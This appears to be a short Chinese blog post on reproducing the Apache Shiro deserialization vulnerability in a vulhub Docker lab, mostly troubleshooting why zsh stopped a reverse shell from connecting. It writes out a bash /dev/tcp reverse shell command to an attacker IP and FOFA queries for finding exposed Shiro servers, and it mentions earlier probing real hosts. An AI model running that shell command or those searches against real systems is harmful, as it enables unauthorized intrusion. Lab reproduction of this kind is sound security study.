shiro反序列化復現(續) ---利用docker-vulhub搭建復現(為了打出shell,針對linux系統)
阿新 • • 發佈:2020-08-14
續寫上次那個因為用fofa去搜索發現找出的是windows系統,所以利用nc沒有將shell反彈出來,windows中系統命令反彈還未研究,所以先利用linux系統,更直觀點。
命令指令碼再前兩章有寫,可以訪問
https://www.cnblogs.com/hcrk/p/13491714.html
下載使用。
環境搭建:
https://github.com/vulhub/vulhub docker環境
上一篇沒有寫道用fofa去搜索,在此附上,fofa語法:
header="rememberme=deleteMe"、header="shiroCookie"
直接進入主題,其他操作上一章說的比較清楚,現在只是復現出反彈shell和我踩過的坑。
本人的Ubuntu使用了裝x外掛zsh(Oh My Zsh)導致昨天再復現過程中一直彈不出shell。
今天發現問題所在,(其實也可以不是這種問題,但是測試確實可以了)
我是直接進入root許可權的,
是不是感覺有點花裡胡哨,哈哈哈。
執行:bash -i >& /dev/tcp/192.168.110.152/6666 0>&1
可以發現這個zsh幫bash命令中的/dev/tcp/192.168.110.152/6666當成目錄解析了。所以執行不了。
但是我又發現,我可以直接進入docker那個映象容器。
這裡並可以執行bash命令。(現在就是原因不明,是我一開始沒有啟用docker這個,但是生成環境這個docker容器自動啟動存在,但是為什麼卻反彈不過來呢)
我的結論就是因為zsh不支援,i我利用 就可以。
sudo docker-compos start
所以搭建zsh的小夥伴們要是再做這樣的實驗的話還是利用sudo啟動docker環境。可以直接用root許可權還有點問題,也可能你們普通使用者也加了zsh。這是我遇到的問題,不知道有沒有幫助。